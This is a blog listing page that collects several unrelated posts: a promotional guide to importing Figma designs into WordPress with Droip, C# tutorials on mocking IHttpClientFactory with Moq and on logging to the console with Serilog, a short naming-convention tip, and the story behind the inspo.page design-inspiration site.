Blog

  • From Figma to WordPress in Minutes with Droip



    When the team at Droip first introduced their amazing builder, we received an overwhelming amount of positive feedback from our readers and community. That’s why we’re especially excited to welcome the Droip team back—this time to walk us through how to actually use their tool and bring Figma designs to life in WordPress.

    Even though WordPress has powered the web for years, turning a modern Figma design into a WordPress site still feels like a struggle: outdated page builders, rigid layouts, and endless back-and-forth with developers, only to end up with a site that never quite matches the design.

    That gap is exactly what Droip is here to close.

    Droip is a no-code website builder that takes a fresh approach to WordPress building, giving you full creative control without all the usual roadblocks.

    What makes it especially exciting for Figma users is the instant Figma-to-Droip handoff. Instead of handing off your design for a rebuild, you can literally copy from Figma and paste it into Droip. Your structure, layers, and layout come through intact, ready to be edited, extended, and published.

    In this guide, I’ll show you exactly how to prep your Figma file and go from a static mockup to a live WordPress site in minutes using a powerful no-code WordPress Builder.

    What is Droip?

    Droip is a relatively new no-code WordPress website builder that is already making quite a buzz for bringing the design freedom of Figma and the power of true no-code to WordPress.

    It’s not another rigid page builder that forces you into pre-made blocks or bloated layouts. Instead, Droip gives you full visual control over your site, from pixel-perfect spacing to responsive breakpoints, interactions, and dynamic content.

    Here’s what makes it different:

    • Designer-first approach: Work visually like you do in Figma or Webflow.
    • Seamless Figma integration: Copy your layout from Figma and paste it directly into Droip. Your structure, layers, and hierarchy carry over intact.
    • Scalable design system: Use global style variables for fonts, colors, and spacing, so your site remains consistent and easy to update.
    • Dynamic content management: Droip’s Content Manager lets you create custom content types and bind repeated content (like recipes, products, or portfolios) directly to your design.
    • Lightweight & clean code output: Unlike traditional builders, Droip produces clean code, keeping your WordPress site performant and SEO-friendly.

    In short, Droip lets you design a site that works exactly how you envisioned it, without relying on developers or pre-made templates.

    Part 1: Prep Your Figma File

    Good imports start with good Figma files. 

    Think of this step like designing with a builder in mind. You’ll thank yourself later.

    Step 1: Use Auto Layout Frames for Everything

    Don’t just drop elements freely on the canvas; wrap them in Frames with Auto Layout. Auto Layout helps Droip understand how your elements are structured. It improves spacing, alignment, and responsiveness.

    So the better your hierarchy, the cleaner your import. 

    • Wrap pages in a frame, set the max width (1320px is my go-to).
    • Place all design elements inside this Frame.
    • If you’re using grids, make sure they’re real grids, not just eyeballed. Set proper dimensions in Figma.

    Step 2: Containers with Min/Max Constraints

    When needed, give Frames min/max width and height constraints. This makes responsive scaling inside Droip way more predictable.

    Step 3: Use Proper Elements Nesting & Naming 

    Droip reads your file hierarchically, so how you nest and name elements in Figma directly affects how your layout behaves once imported.

    I recommend using Auto Layout Frames for all structural elements and naming the frames properly. 

    • Buttons with icons: Wrap the button and its icon inside an Auto Layout Frame and name it Button.
    • Form fields with labels: Wrap each label and input combo in an Auto Layout Frame and name it Input.
    • Sections with content: Wrap headings, text, and images inside an Auto Layout Frame, and give it a clear name like Section_Hero or Section_Features.

    Pro tip: Never leave elements floating outside frames. This ensures spacing, alignment, and responsiveness are preserved, and Droip can interpret your layout accurately.

    Step 4: Use Supported Element Names

    Droip reads your Figma layers and tries to understand what’s what, and naming plays a big role here. 

    If you use certain keywords, Droip will instantly recognize elements like buttons, forms, or inputs and map them correctly during import.

    For example: name a button layer “Button” (or “button” / “BUTTON”), and Droip knows to treat it as an actual button element rather than just a styled rectangle. The same goes for inputs, textareas, sections, and containers.

    Here are the supported names you can use:

    • Button: Button, button, BUTTON
    • Form: Form, form, FORM
    • Input: Input, input, INPUT
    • Textarea: Textarea, textarea, TEXTAREA
    • Section: Section, section, SECTION
    • Container: Container, container, CONTAINER

    Step 5: Flatten Decorative Elements

    Icons, illustrations, or complex vector shapes can get messy when imported as-is. To avoid errors, right-click and Flatten them in Figma. This keeps your file lightweight and makes the import into Droip cleaner and faster.

    Step 6: Final Clean-Up

    Before you hit export, give your file one last polish:

    • Delete any empty or hidden layers.
    • Double-check spacing and alignment.
    • Make sure everything lives inside a neat Auto Layout Frame.

    A little housekeeping here saves a lot of time later. Once your file is tidy, you’re all set to import it into Droip.

    Prepping Droip Before You Import

    So you’ve cleaned up your Figma file, nested your elements properly, and named things clearly. 

    But before you hit copy–paste, there are a few things to set up in Droip that will save you a ton of time later. Think of this as laying the groundwork for a scalable, maintainable design system inside your site.

    Install the Fonts You Used in Figma

    If your design relies on a specific font, you’ll want Droip to have it too.

    • Google Fonts: These are easy, just select from Droip’s font library.
    • Custom Fonts: If you used a custom font, upload and install it in Droip before importing. Otherwise, your site may fall back to a default font, and all that careful typography work will go to waste.

    Create Global Style Variables (Fonts, Sizes, Colors)

    Droip gives you a Variables system (like tokens in design systems) that makes your site easier to scale.

    • Set up font variables (Heading, Body, Caption).
    • Define color variables for your brand palette (Primary, Secondary, Accent, Background, Text).
    • Add spacing and sizing variables if your design uses consistent paddings or margins.

    When you paste your design into Droip, link your imported elements to these variables. This way, if your brand color ever changes, you update it once in variables and everything updates across the site.

    Prepare for Dynamic Content

    If your design includes repeated content like recipes, team members, or product cards, you don’t want to hard-code those. Droip’s Content Manager lets you create Collections that act like databases for your dynamic data.

    Here’s the flow:

    • In Droip, create a Collection (e.g., “Recipes” with fields like Title, Date, Image, Ingredients, Description, etc.).
    • Once your design is imported, bind the elements (like the recipe card in your design) to those fields.

    Part 2: Importing Your Figma Design into Droip

    Okay, so your Figma file is clean, your fonts and variables are set up in Droip, and you’re ready to bring your design to life. The import process is actually surprisingly simple, but there are a few details you’ll want to pay attention to along the way.

    If you don’t have a design ready, no worries. I’ve prepared a sample Figma file that you can import into Droip. Grab the Sample Figma File and follow along as we go from design to live WordPress site.

    Step 1: Install the Figma to Droip Plugin

    First things first, you’ll need the Figma to Droip plugin that makes this whole workflow possible.

    • Open Figma
    • Head to the Resources tab in the top toolbar
    • Search for “Figma to Droip”
    • Click Install

    That’s it, you’ll now see it in your Plugins list, ready to use whenever you need it.

    Step 2: Select and Generate Your Design

    Now let’s get your layout ready for the jump.

    • In Figma, select the Frame you want to export.
    • Right-click > Plugins > Figma to Droip.
    • When the plugin panel opens, click Generate.
    • Once it’s done processing, hit Copy.

    Make sure you’re selecting a final, polished version of your frame. Clean Auto Layout, proper nesting, and consistent naming will all pay off here.

    Step 3: Paste into Droip

    Here’s where the magic happens.

    • Open Droip and create a new page.
    • Click anywhere on the canvas or workspace.
    • Paste (Cmd + V on Mac, Ctrl + V on Windows).

    Droip will instantly import your design, keeping the layout structure, spacing, styles, groupings, and hierarchy from Figma. 

    Not only that, Droip automatically converts your Figma layout into a responsive structure. That means your design isn’t just pasted in as a static frame; it adapts across breakpoints right away, even custom ones. 

    Best of all, Droip outputs clean, lightweight code under the hood, so your WordPress site stays fast, secure, and SEO-friendly as well.

    And just like that, your static design is now editable in WordPress.

    Step 4: Refine Inside Droip

    The foundation is there; now all you need to do is add the finishing touches. 

    After pasting, you’ll want to refine your site and hook it into Droip’s powerful features:

    • Link to variables: Assign your imported fonts, colors, and sizes to the global style variables you created earlier. This makes your site scalable and future-proof.
    • Dynamic content: Replace static sections with collections from the Content Manager (think recipes, portfolios, products).
    • Interactions & animations: Add hover effects, transitions, and scroll-based behaviors, the kind of micro-interactions that bring your design to life.
    • Media: Swap out placeholder assets for final images, videos, or icons.

    Step 5: Set Global Header & Footer 

    After import, you’ll want your header and footer to stay consistent across every page. The easiest way is to turn them into Global Components.

    • Select your header in the Layers panel > Right-click > Create Symbol.
    • Open the Insert Panel > Go to Symbols > Assign it as your Global Header.
    • Repeat the same steps for your footer.

    Now, whenever you edit your header or footer, those changes will automatically sync across your entire site.

    Step 6: Preview & Publish

    Almost there.

    • Hit Preview to test responsiveness, check spacing, and see your interactions in action.
    • When everything feels right, click Publish, and your page is live.

    And that’s it. In just a few steps, your Figma design moves from a static mockup to a living, breathing WordPress site.

    Wrapping Up: From Figma to WordPress Instantly

    What used to take weeks of handoff, revisions, and compromises can now happen in minutes. You still keep all the freedom to refine, extend, and scale, but without the friction of developer bottlenecks or outdated page builders.

    So if you’ve ever wanted to skip the “translation gap” between design and development, this is your fastest way to turn Figma designs into live WordPress websites using a no-code WordPress Builder.

    Get started with Droip and try it yourself!



    Source link

  • How to test HttpClientFactory with Moq


    Mocking IHttpClientFactory is hard, but luckily we can use some advanced features of Moq to write better tests.


    When working on any .NET application, one of the most common things you’ll see is using dependency injection to inject an IHttpClientFactory instance into the constructor of a service. And, of course, you should test that service. To write good unit tests, it is a good practice to mock the dependencies to have full control over their behavior. A well-known library to mock dependencies is Moq; integrating it is pretty simple: if you have to mock a dependency of type IMyService, you can create mocks of it by using Mock<IMyService>.

    But here comes a problem: mocking IHttpClientFactory is not that simple, and just using Mock<IHttpClientFactory> is not enough.

    In this article, we will learn how to mock IHttpClientFactory dependencies, how to define the behavior for HTTP calls, and finally, we will deep dive into the advanced features of Moq that allow us to mock that dependency. Let’s go!

    Introducing the issue

    To fully understand the problem, we need a concrete example.

    The following class implements a service with a method that, given an input string, sends it to a remote client using a DELETE HTTP call:

    public class MyExternalService
    {
        private readonly IHttpClientFactory _httpClientFactory;
    
        public MyExternalService(IHttpClientFactory httpClientFactory)
        {
            _httpClientFactory = httpClientFactory;
        }
    
        public async Task DeleteObject(string objectName)
        {
            string path = $"/objects?name={objectName}";
            var client = _httpClientFactory.CreateClient("ext_service");
    
            var httpResponse = await client.DeleteAsync(path);
    
            httpResponse.EnsureSuccessStatusCode();
        }
    }
    

    The key point to notice is that we are injecting an instance of IHttpClientFactory; we are also creating a new HttpClient every time it’s needed by using _httpClientFactory.CreateClient("ext_service").

    As you may know, you should not instantiate new HttpClient objects every time to avoid the risk of socket exhaustion (see links below).

    There is a huge problem with this approach: it’s not easy to test it. You cannot simply mock the IHttpClientFactory dependency, but you have to manually handle the HttpClient and keep track of its internals.

    Of course, we will not use real IHttpClientFactory instances: we don’t want our application to perform real HTTP calls. We need to mock that dependency.

    Think of mocked dependencies as movie stunt doubles: you don’t want your main stars to get hurt while performing action scenes. In the same way, you don’t want your application to perform actual operations when running tests.

    Creating mocks is like using stunt doubles for action scenes

    We will use Moq to test the method and check that the HTTP call is correctly adding the objectName variable in the query string.

    How to create mocks of IHttpClientFactory with Moq

    Let’s begin with the full code for the creation of a mocked IHttpClientFactory:

    var handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    
    HttpResponseMessage result = new HttpResponseMessage();
    
    handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
        .ReturnsAsync(result)
        .Verifiable();
    
    var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
        };
    
    var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
    mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
    service = new MyExternalService(mockHttpClientFactory.Object);
    

    A lot of stuff is going on, right?

    Let’s break it down to fully understand what all those statements mean.

    Mocking HttpMessageHandler

    The first instruction we meet is

    var handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    

    What does it mean?

    HttpMessageHandler is the fundamental part of every HTTP request in .NET: it performs a SendAsync call to the specified endpoint with all the info defined in an HttpRequestMessage object passed as a parameter.

    Since we are interested in what happens to the HttpMessageHandler, we need to mock it and store the result in a variable.

    Have you noticed that MockBehavior.Strict? This is an optional parameter that makes the mock throw an exception when it doesn’t have a corresponding setup. To try it, remove that argument from the constructor and comment out the handlerMock.Setup() part: when you run the tests, you’ll receive an error of type Moq.MockException.
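
    For comparison, here’s a minimal sketch of the default, loose behavior (no Strict argument):

    // MockBehavior.Loose is the default: invocations without a matching Setup
    // return default values instead of throwing a Moq.MockException.
    var looseHandlerMock = new Mock<HttpMessageHandler>();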

    Next step: defining the behavior of the mocked HttpMessageHandler.

    Defining the behavior of HttpMessageHandler

    Now we have to define what happens when we use the handlerMock object in any HTTP operation:

    HttpResponseMessage result = new HttpResponseMessage();
    
    handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
        .ReturnsAsync(result)
        .Verifiable();
    

    The first thing we meet is that Protected(). Why?

    To fully understand why we need it, and what is the meaning of the next operations, we need to have a look at the definition of HttpMessageHandler:

    // Summary: A base type for HTTP message handlers.
    public abstract class HttpMessageHandler : IDisposable
    {
        /// Other stuff here...
    
        // Summary: Send an HTTP request as an asynchronous operation.
        protected internal abstract Task<HttpResponseMessage> SendAsync(
            HttpRequestMessage request,
            CancellationToken cancellationToken);
    }
    

    From this snippet, we can see that we have a method, SendAsync, which accepts an HttpRequestMessage object and a CancellationToken, and which is the one that deals with HTTP requests. But this method is protected. Therefore we need to use Protected() to access the protected methods of the HttpMessageHandler class, and we must set them up by using the method name and the parameters in the Setup method.

    With Protected() you can access protected members

    Two details to notice, then:

    • We specify the method to set up by using its name as a string: “SendAsync”
    • To say that we don’t care about the actual values of the parameters, we use ItExpr instead of It because we are dealing with the setup of a protected member.

    If SendAsync were a public method, we would have done something like this:

    handlerMock
        .Setup(_ => _.SendAsync(
            It.IsAny<HttpRequestMessage>(), It.IsAny<CancellationToken>())
        );
    

    But, since it is a protected method, we need to use the approach shown above.

    Then, we define that the call to SendAsync returns an object of type HttpResponseMessage: here we don’t care about the content of the response, so we can leave it in this way without further customizations.
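
    If the method under test also inspected the response, we could customize the returned HttpResponseMessage; a minimal sketch (the status code and JSON body here are purely illustrative):

    HttpResponseMessage result = new HttpResponseMessage(System.Net.HttpStatusCode.OK)
    {
        Content = new StringContent("{\"deleted\": true}") // hypothetical response body
    };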

    Creating HttpClient

    Now that we have defined the behavior of the HttpMessageHandler object, we can pass it to the HttpClient constructor to create a new instance of HttpClient that acts as we need.

    var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
        };
    

    Here I’ve set the value of the BaseAddress property to a valid URI to avoid null references when performing the HTTP call. You can even use non-existing URLs: the important thing is that the URL must be well-formed.

    Configuring the IHttpClientFactory instance

    We are finally ready to create the IHttpClientFactory!

    var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
    mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
    var service = new MyExternalService(mockHttpClientFactory.Object);
    

    So, we create the Mock of IHttpClientFactory and define the instance of HttpClient that will be returned when calling CreateClient("ext_service"). Finally, we’re passing the instance of IHttpClientFactory to the constructor of MyExternalService.

    How to verify the calls performed by IHttpClientFactory

    Now, suppose that in our test we’ve performed the operation under test.

    // setup IHttpClientFactory
    await service.DeleteObject("my-name");
    

    How can we check if the HttpClient actually called an endpoint with “my-name” in the query string? As before, let’s look at the whole code, and then let’s analyze every part of it.

    // verify that the query string contains "my-name"
    
    handlerMock.Protected()
     .Verify(
        "SendAsync",
        Times.Exactly(1), // we expected a single external request
        ItExpr.Is<HttpRequestMessage>(req =>
            req.RequestUri.Query.Contains("my-name") // Query string contains my-name
        ),
        ItExpr.IsAny<CancellationToken>()
        );
    

    Accessing the protected instance

    As we’ve already seen, the object that performs the HTTP operation is the HttpMessageHandler, which here we’ve mocked and stored in the handlerMock variable.

    Then we need to verify what happened when calling the SendAsync method, which is a protected method; thus we use Protected to access that member.

    Checking the query string

    The core part of our assertion is this:

    ItExpr.Is<HttpRequestMessage>(req =>
        req.RequestUri.Query.Contains("my-name") // Query string contains my-name
    ),
    

    Again, we are accessing a protected member, so we need to use ItExpr instead of It.

    The Is<HttpRequestMessage> method accepts a Func<HttpRequestMessage, bool> that we can use to determine whether a property of the HttpRequestMessage under test (in our case, we named that variable req) matches the specified predicate. If so, the test passes.
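
    The same pattern can validate any other property of the request. For example, sticking to the DeleteObject method above, a sketch that also checks the HTTP verb and the path:

    handlerMock.Protected()
        .Verify(
            "SendAsync",
            Times.Exactly(1),
            ItExpr.Is<HttpRequestMessage>(req =>
                req.Method == HttpMethod.Delete              // the service sends a DELETE
                && req.RequestUri.AbsolutePath == "/objects" // to the expected path
            ),
            ItExpr.IsAny<CancellationToken>()
        );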

    Refactoring the code

    Imagine having to repeat that code for every test method in your class – what a mess!

    So we can refactor it: first of all, we can move the HttpMessageHandler mock to the SetUp method:

    [SetUp]
    public void Setup()
    {
        this.handlerMock = new Mock<HttpMessageHandler>(MockBehavior.Strict);
    
        HttpResponseMessage result = new HttpResponseMessage();
    
        this.handlerMock
        .Protected()
        .Setup<Task<HttpResponseMessage>>(
            "SendAsync",
            ItExpr.IsAny<HttpRequestMessage>(),
            ItExpr.IsAny<CancellationToken>()
        )
        .Returns(Task.FromResult(result))
        .Verifiable()
        ;
    
        var httpClient = new HttpClient(handlerMock.Object) {
            BaseAddress = new Uri("https://www.code4it.dev/")
            };
    
        var mockHttpClientFactory = new Mock<IHttpClientFactory>();
    
        mockHttpClientFactory.Setup(_ => _.CreateClient("ext_service")).Returns(httpClient);
    
        this.service = new MyExternalService(mockHttpClientFactory.Object);
    }
    

    and keep a reference to handlerMock and service in some private members.
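
    Those private members, matching the names used above, could look like this:

    private Mock<HttpMessageHandler> handlerMock;
    private MyExternalService service;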

    Then, we can move the assertion part to a different method, maybe to an extension method:

    public static void Verify(this Mock<HttpMessageHandler> mock, Func<HttpRequestMessage, bool> match)
    {
        mock.Protected().Verify(
            "SendAsync",
            Times.Exactly(1), // we expected a single external request
        ItExpr.Is<HttpRequestMessage>(req => match(req)),
            ItExpr.IsAny<CancellationToken>()
        );
    }
    

    So that our test can be simplified to just a bunch of lines:

    [Test]
    public async Task Method_Should_ReturnSomething_When_Condition()
    {
        //Arrange occurs in the SetUp phase
    
        //Act
        await service.DeleteObject("my-name");
    
        //Assert
        handlerMock.Verify(r => r.RequestUri.Query.Contains("my-name"));
    }
    

    Further readings

    🔗 Example repository | GitHub

    🔗 Why we need HttpClientFactory | Microsoft Docs

    🔗 HttpMessageHandler class | Microsoft Docs

    🔗 Mock objects with static, complex data by using Manifest resources | Code4IT

    🔗 Moq documentation | GitHub

    🔗 How you can create extension methods in C# | Code4IT

    Wrapping up

    In this article, we’ve seen how tricky it can be to test services that rely on IHttpClientFactory instances. Luckily, we can rely on tools like Moq to mock the dependencies and have full control over the behavior of those dependencies.

    Mocking IHttpClientFactory is hard, I know. But here we’ve found a way to overcome those difficulties and make our tests easy to write and to understand.

    There are lots of NuGet packages out there that help us mock that dependency: do you use any of them? What is your favourite, and why?

    Happy coding!

    🐧



    Source link

  • The Journey Behind inspo.page: A Better Way to Collect Web Design Inspiration




    Have you ever landed on a website and thought, “Wow, this is absolutely beautiful”? You know that feeling when every little animation flows perfectly, when clicking a button feels satisfying, when the whole experience just feels premium.

    That’s exactly what happened to me a few years ago, and it changed everything.

    The Moment Everything Clicked

    I was browsing the web when I stumbled across one of those websites. You know the type where every micro-animation has been crafted with care, where every transition feels intentional. It wasn’t just pretty; it made me feel something.

    That’s when I got hooked on web design.

    But here’s the thing: I wanted to create websites like that too. I wanted to capture that same magic, those same emotions. So I started doing what any curious designer does. I began collecting inspiration.

    Spotting a Gap

    At first, I used the usual inspiration websites. They’re fantastic for discovering beautiful sites and getting that creative spark. But I noticed something: they showed you the whole website, which is great for overall inspiration.

    The thing is, sometimes I’d get obsessed with just one specific detail. Maybe it was a button animation, or how an accordion opened, or a really smooth page transition. I’d bookmark the entire site, but then later I’d spend ages trying to find that one perfect element again.

    I started thinking there might be room for something more specific. Something where you could find inspiration at the component level, not just the full-site level.

    Starting Small

    So I started building my own library. Whenever I saw something cool (a smooth page transition, an elegant pricing section, a cool navigation animation) I’d record it and save it with really specific tags like “card,” “hero section,” or “page transition.”

    Early versions of my local library in Eagle

    Real, useful categories that actually helped me find what I needed later. I did this for years. It became my secret weapon for client projects and personal work.

    From Personal Tool to Public Resource

    After a few years of building this personal collection, I had a thought: “If this helps me so much, maybe other designers and developers could use it too.”

    That’s when I decided I should share this with the world. But I didn’t want to just dump my library online and call it a day. It was really important to me that people could filter stuff easily, that it would be intuitive, and that it would work well on both mobile and desktop. I wanted it to look good and actually be useful.

    Early version of inspo.page; filters were not sticky at the bottom

    That’s how inspo.page was born.

    How It Actually Works

    The idea behind inspo.page is simple: instead of broad categories, I built three specific filter systems:

    • What – All the different components and layouts. Looking for card designs? Different types of lists? Different types of modals? It’s all here.
    • Where – Sections of websites. Need inspiration for a hero section? A pricing page? Social proof section? Filter by where it appears on a website.
    • Motion – Everything related to movement. Page transitions, parallax effects, hover animations.

    The magic happens when you combine these filters. Want to see card animations specifically for pricing sections? Or parallax effects used for presenting services? Just stack the filters and get exactly what you’re looking for.

    The Technical Side

    On the technical side, I’m using Astro and Sanity. Because I’m sometimes lazy and I really wanted a project that’s future-proof, I made curating inspiration as simple as possible for myself.

    That’s why I came up with this automation system where I just hit record and that’s it. It automatically grabs the URL, creates different video versions, compresses everything, hosts it on Bunny.net, and then sends it to the CMS so I just have to tag it and publish.

    Tagging system inside Sanity

    I really wanted to find a system that makes it as easy as possible for me to do what I want to do because I knew if there was too much resistance, I’d eventually stop doing it.

    The Hardest Part

    You’d probably think the hardest part was all the technical stuff like setting up automations and managing video uploads. But honestly, that was the easy part.

    The real challenge was figuring out how to organize everything so people could actually find what they’re looking for.

    I must have redesigned the entire tagging system at least 10 times. Every time I thought I had it figured out, I’d realize it was either way too complicated or way too vague. Too many specific tags and people get overwhelmed scrolling through endless options. Too few broad categories and everything just gets lumped together uselessly.

    It’s this weird balancing act. You need enough categories to be helpful, but not so many that people give up before they even start filtering. And the categories have to make sense to everyone, not just me.

    I think I’ve got a system now that works pretty well, but it might change in the future. If users tell me there’s a better way to organize things, I’m really all ears because honestly, it’s a difficult problem to solve. Even though I have something that seems to work now, there might be a much better approach out there.

    The Human Touch in an AI World

    Here’s something I think about a lot: AI can build a decent-looking website in minutes now. Seriously, it’s pretty impressive.

    But there’s still something missing. AI can handle layouts and basic styling, but it can’t nail the human stuff yet. Things like the timing of a hover effect, the weight of a transition, or knowing exactly how a micro-interaction should feel. That’s pure taste and intuition.

    Those tiny details are what make websites feel alive instead of just functional. And in a world where anyone can generate a website in 5 minutes, those details are becoming more valuable than ever.

    That’s exactly where inspo.page comes in. It helps you find inspiration for the things that separate good websites from unforgettable ones.

    What’s Next

    Every week, I’m adding more inspiration to the platform. I’m not trying to build the biggest collection out there, just something genuinely useful. If I can help a few designers and developers find that perfect animation a little bit faster, then I’m happy.

    Want to check it out? Head over to inspo.page and see if you can find your next favorite interaction. You can filter by specific components (like cards, buttons, modals, etc.), website sections (hero, pricing, etc.), or motion patterns (parallax, page transitions, you name it).

    And if you stumble across a website with some really nice animations or micro-interactions, feel free to share it using the feedback button (top right) on the site. I’m always on the lookout for inspiration pieces that have that special touch. Can’t promise I’ll add everything, but I definitely check out what people send.

    Hope you find something that sparks your next great design!



    Source link

  • use the same name for the same concept | Code4IT



    As I always say, naming things is hard. We’ve already talked about this in a previous article.

    By creating a simple and coherent dictionary, your classes will have better names because you are representing the same idea with the same name. This improves code readability and searchability. Also, by simply looking at the names of your classes, you can grasp their meaning.

    Say that we have 3 objects that perform similar operations: they download some content from external sources.

    class YouTubeDownloader {    }
    
    class TwitterDownloadManager {    }
    
    class FacebookDownloadHandler {    }
    

    Here we are using 3 different words for the same concept: Downloader, DownloadManager, DownloadHandler. Why?

    And, if you want to find similar classes, you can’t even search for “Downloader” in your IDE.

    The solution? Use the same name to indicate the same concept!

    class YouTubeDownloader {    }
    
    class TwitterDownloader {    }
    
    class FacebookDownloader {    }
    

    It’s as simple as that! Just a small change can drastically improve the readability and usability of your code!

    So, consider also this small kind of issue when reviewing PRs.

    Conclusion

    A common dictionary helps to understand the code without misunderstandings. Of course, this tip does not apply only to class names, but to variables too. Avoid using synonyms for objects (e.g., video and clip). Instead of synonyms, use more specific names (YouTubeVideo instead of Video).
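
    Here’s a minimal sketch of that last tip (the class names are just for illustration):

    // Synonyms hide that these model the same concept:
    class Video {    }
    class Clip {    }

    // One concept, one name, made specific where it matters:
    class YouTubeVideo {    }
    class VimeoVideo {    }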

    Any other ideas?

    👉 Let’s discuss it on Twitter or on the comment section below!

    🐧





    Source link

  • How to log to Console with .NET Core and Serilog | Code4IT


    Serilog is a popular logging library for .NET projects. In this article, we will learn how to integrate it into a .NET API project and output the logs on a Console.


    Having meaningful logs is crucial for any application: without logs, we would not be able to see if errors occur, what’s the status of the application, if there are strange behaviors that should worry us, and so on.

    To define a good logging strategy, we need two parts, equally important: adding logs to our code and analyzing the data produced by our logs.

    In this article, we will see how to add Serilog, a popular logger library, to our .NET projects: we will learn how to configure it to print the logs on a Console.

    Why logging on console

    I can guess what you’re thinking:

    why should we write logs on Console? We should store them somewhere, to analyze them!

    And… you’d be right!

    But still, printing logs on Console can be useful in many ways.

    First of all, by printing on Console you can check that the logging is actually working, and you haven’t missed a configuration.

    Then, writing on Console is great when debugging locally: just spin up your application, run the code you need, and check what happened on the logs; in this way you can understand the internal state of the application, which warnings and errors occurred, and more.

    Lastly, because of an odd strategy that I’ve seen implemented in many projects: print the logs on Console, add an agent that reads them and stores them in memory, and then send all the logs to the destination platform at once; in this way, you’ll perform fewer HTTP requests against those platforms, saving money and avoiding hitting the connection limits of the destination platform.

    Now that we have good reasons to log on Console, well… let’s do it!

    Adding Serilog on Program class

    For this article, we will add Serilog logs to a simple .NET API project.

    Create a new API project – you know, the one with the WeatherForecast controller.

    Then, navigate to the Program class: by default, it should look like this:

    public class Program
    {
        public static void Main(string[] args)
        {
            CreateHostBuilder(args).Build().Run();
        }
    
        public static IHostBuilder CreateHostBuilder(string[] args) =>
            Host.CreateDefaultBuilder(args)
            .ConfigureWebHostDefaults(webBuilder =>
            {
                webBuilder.UseStartup<Startup>();
            });
    }
    

    There are no references to any logger, and, of course, to Serilog.

    So the first thing to do is to install it. Via NuGet, install Serilog.AspNetCore and Serilog.Extensions.Logging. The first one allows you to add Serilog to an ASP.NET project, while the second one allows you to use the native .NET logger in the code with all the capabilities provided by Serilog.

    Then, we need to add the logger to our project:

    public class Program
    {
        public static void Main(string[] args)
        {
    +        Log.Logger = new LoggerConfiguration()
    +                .CreateLogger();
    
            CreateHostBuilder(args).Build().Run();
        }
    
        public static IHostBuilder CreateHostBuilder(string[] args) =>
            Host.CreateDefaultBuilder(args)
    +        .UseSerilog((hostingContext, loggerConfiguration) =>
    +                    loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration))
                .ConfigureWebHostDefaults(webBuilder =>
                {
                    webBuilder.UseStartup<Startup>();
                });
    }
    

    There are two snippets to understand:

    Log.Logger = new LoggerConfiguration().CreateLogger();
    

    creates a new logger with the specified configurations (in our case, we use the default values), and then assigns the newly created logger to the globally-shared logger Log.Logger.

    Log.Logger lives in the Serilog namespace, so you have to add it to the using list.

    Then, we have this second part:

    .UseSerilog((hostingContext, loggerConfiguration) =>
            loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration)
        )
    

    This snippet defines where to get the Serilog configurations (in this case, from the same place used by the hosting context), and then sets Serilog as the logging provider.

    Inject the logger into constructors

    Since we have bound the Serilog logger to the one native on .NET – the one coming from Microsoft.Extensions.Logging – we can use the native logger everywhere in the project.

    Add a dependency to ILogger<T> in your constructor, where T is the name of the class itself:

    public class WeatherForecastController : ControllerBase
    {
    
        private readonly ILogger<WeatherForecastController> _logger;
    
        public WeatherForecastController(ILogger<WeatherForecastController> logger)
        {
            _logger = logger;
        }
    }
    

    So that you can use the different levels of logging and the Structured Data (see links below) to add more info:

    _logger.LogInformation("Getting random items. There are {AvailableItems} possible values", Summaries.Count());
    
    _logger.LogWarning("This is a warning");
    
    try
    {
        throw new ArgumentException();
    }
    catch (Exception ex)
    {
        _logger.LogError(ex, "And this is an error");
    }
    

    Update the AppSettings file

    But that’s not enough. We aren’t saying that our logs should be printed on Console. To do that, we must update the appsettings.json file and add some new configurations.

    "Serilog": {
        "Using": [ "Serilog.Sinks.Console" ],
        "MinimumLevel": {
            "Default": "Verbose",
            "Override": {
                "Microsoft": "Warning",
                "Microsoft.AspNetCore": "Warning",
                "System": "Error"
            }
        },
        "WriteTo": [
            {
            "Name": "Async",
            "Args": {
                "configure": [
                {
                    "Name": "Console",
                    "Args": {
                        "formatter": "Serilog.Formatting.Compact.RenderedCompactJsonFormatter, Serilog.Formatting.Compact"
                    }
                }
                ]
            }
            }
        ]
    }
    

    As usual, let’s break it down.

    The first thing to notice is the root of the JSON section: Serilog. This value is the default when defining the configuration values for Serilog (remember the loggerConfiguration.ReadFrom.Configuration(hostingContext.Configuration)? It binds the settings automagically!)

    The Using section defines the types of Sinks that will be used. A Sink is just the destination of the logs. So, just download the Serilog.Sinks.Console NuGet package and add that value to the Using array to use the Console as a Sink.

    Then, we have the MinimumLevel object: it defines the minimum levels of logs that will be taken into consideration. Here the default value is Verbose, but you’ll probably want it to be Warning in your production environment: in this way, all the logs with a level lower than Warning will be ignored.

    Lastly, we have the WriteTo section, which defines the exact configurations of the sinks. Notice the Async value: it wraps the actual sinks so that logs are written asynchronously, without blocking the application. So, after you’ve installed the Serilog.Sinks.Async NuGet package, you must add the Async value to that object. And then you can configure the different Sinks: here I’m adding a JSON formatter to the Console Sink.
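
    For reference, the same pipeline can also be configured in code instead of appsettings.json; a minimal sketch, assuming the Serilog.Sinks.Console, Serilog.Sinks.Async, and Serilog.Formatting.Compact packages are installed:

    // using Serilog;
    // using Serilog.Formatting.Compact;
    Log.Logger = new LoggerConfiguration()
        .MinimumLevel.Verbose()
        .WriteTo.Async(a => a.Console(new RenderedCompactJsonFormatter()))
        .CreateLogger();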

    Run the application

    We’re finally ready to run our application.

    Just run it with the usual IIS profile and… nothing happens! Where is the Console??

    With IIS you cannot see any Console, since it simply does not exist – if the application runs as a web application, we don’t need the Console.

    So, you have to change the running profile and select the name of your application (in my case, SerilogLoggingOnConsole).

    Use the correct running profile

